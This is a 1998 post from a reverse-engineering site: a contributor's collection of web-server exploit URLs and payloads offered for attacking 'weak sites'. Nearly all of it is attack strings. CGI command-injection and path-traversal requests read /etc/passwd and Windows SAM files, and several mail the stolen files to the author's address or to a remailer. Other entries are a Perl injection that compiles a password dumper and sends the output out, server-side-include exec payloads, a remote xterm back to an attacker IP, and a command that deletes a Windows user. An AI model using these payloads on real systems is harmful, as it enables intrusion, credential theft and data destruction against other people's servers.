courtesy of fravia+'s page of reverse engineering
12 November 1998
Well, this is an interesting addition... only for real reversers, though, beginners, please go study some elementary site busting first... for all the other ones... I don't think I need to explain you how interesting this stuff is... Enjoy! :-)
hi fravia+, this is my collection of "how to exploit weak sites with your browser" i'm working an a document which includes very new exploits .. i'll let you know when it is ready ... haveaniceday RUDICARELL # test cgi's /cgi-bin/test-cgi?\whatever /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd /cgi-bin/test-cgi?/* /cgi-bin/test-cgi?* HTTP/1.0 /cgi-bin/test-cgi?x * /cgi-bin/nph-test-cgi?* HTTP/1.0 /cgi-bin/nph-test-cgi?x * # jj /cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls # betterones /cgi-bin/info2www?(../../../../../../../bin/mail rudicarell@hotmail.com </etc/passwd) /cgi-bin/blabla?%0a/bin/cat%20/etc/passwd /cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+rudicarell@hotmail.com+%3C+etc%2Fpasswd /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd /cgi-bin/phf?%0a blablabla &Qalias=&Qname=&Qemail=&Qnickname=&Qoffice_phone= ... usw /cgi-bin/php.cgi?/etc/passwd /cgi-bin/fi?/etc/passwd /cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com] /cgi-bin/textcounter.pl?/;IFS=\8;(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|echo;echo| # other stuff /dir/doit.phtml?/home/ftp/incoming/executemycode.phtml /cgi-bin/AnyForm2? ...??? /cgi-bin/infogate? ...??? /cgi-bin/test.bat?&dir .... netscape server /scripts/test.bat+%26dir+%26time+%26abracadabra.exe .... netscape server # microfuck /guti.asp::$DATA asp ...... /global.asa asp ...... # long filenames :) /somewhere/VERYLON~.HTM .... user save verylongyy.htm file # quid pro quo server /site.name/server%20logfile .... quid pro quo - server # basic auth and others /cgi-bin/www-sql/protected_directory/irgendwas.html /cgi-bin/htmlscript?../../../../../../etc/passwd /cgi-bin/campas?%0acat%0a/etc/passwd%0a /cool-logs/mlog.html?screen=/etc/passwd /cool-logs/mylog.html?screen=/etc/passwd /cgi-bin/view-source?../../../../../../../etc/passwd /cgi-bin/webgais Content-length: (laenge des exploits) query=';mail+rudicarell\@hotmail.com</etc/passwd;echo'&output=subject&domain=paragraph # sgi silicon graphics /cgi-bin/handler/carelli;cat /etc/passwd|?data=Download (sgis! nur tabs!) /cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' (sgis!) /cgi-bin/pfdispaly.cgi?/../../../../etc/motd (sgis! alte version) /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5rudicarell\@hotmail.com\</etc/passwd;eval$CMD;echo # frontpage extensions www.domain.com/beliebiges_directory/_vti_cnf = directory www.domain.com/_vti_pvt = world writeable # old but still working IIS perl.exe nt/scripts/perl.exe?%20-e%20"system%20('dir%20c:\\winnt35\\repair');" # example bor bad perl oa ;xterm -display my.ip.address:0 & john;echo "#include \"pwd.h\"">/tmp/shadow.c john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c john;echo "printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw-name,">>/tmp/shadow.c john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c john;cc -o /tmp/shadow /tmp/shadow.c john;/tmp/shadow>>/tmp/passwd john;/bin/cat /tmp/passwd|/bin/mail remailer@some.remailer.com john;rm /tmp/shadow*;rm /tmp/passwd # sometimes its really bad ~root ~root/etc/passwd (zum beispiel) altavista .... url:etc AND link:passwd ... oder ... root: 0:0 url:.htaccess .. oder .. url:.htpasswd # NCSA files httpd.conf configure the httpd service srm.conf scripts and documents reside access.conf service features for all browsers .htaccess Limits access on a directory-by-directory basis http .... bla bla /.htaccess (NCSA .........) # microfuck http ... bla bla .. /scripts/blabla.bat?&dir+c:\+?&time test.bat+%26dir+%26time+%26pfieffer.exe # novell http ... bla bla .. /files.pl? ../../blabla http ... bla bla .. /scripts/convert.bas?../../any_file_on_sys_volume # MAC WEBSTAR http ... bla bla .. /M_A_C_H_T_T_P_V_E_R_S_I_O_N # lotus domino server (this is really cool) http ... /domcfg.nsf/?open htto ... /domcfg.nsf/URLRedirect/?OpenForm http:... /database.nsf/viewname?SearchView&Query="*" # nt carbo server **** http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog #example for server side includes anon-ftp upload**** <!--#exec cmd="/bin/ls"--> <!--#exec cmd="mail me@my.org < cat /etc/passwd"--> <!--#exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script"--> <!--#exec cmd="~ftp/incoming/uploaded_hack_script"--> <!--#exec cmd="find / -name foobar -print"--> <!--#include file="schweinenasenfile" --> # metaweb servers http://mail.server.com:5000/../smusers.txt http://mail.server.com:5000/../../winnt/repair/sam._ http://mail.server.com:5000/../../winnt/system32/net.exe? http://mail.server.com:5000/../../winnt/system32/net.exe?user%20joe%20/delete port:2040 = javaconfig port:5000 = mail port:5001 = -"- http://www.metainfo.com/products/sendmail/users.htm http://www.metainfo.com/products/metaip/users.htm # verity search software ****** s97_cgi.exe?Action=FormGen&ServerKey=Primary&Template=irgendwas (nt) search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books # uaaa |-) zhhhh wwwboard.html /wwwboard/passwd.txt **** wwwadmin.pl oder wwwadmin.cgi # cgi von hylafax *** /cgi-bin/faxsurvey?/bin/ls%20-a # other microfuck uploader.exe/ # new lotus-domino http://www.server.com/database.nsf/viewname?SearchView&Query="*" /*end*/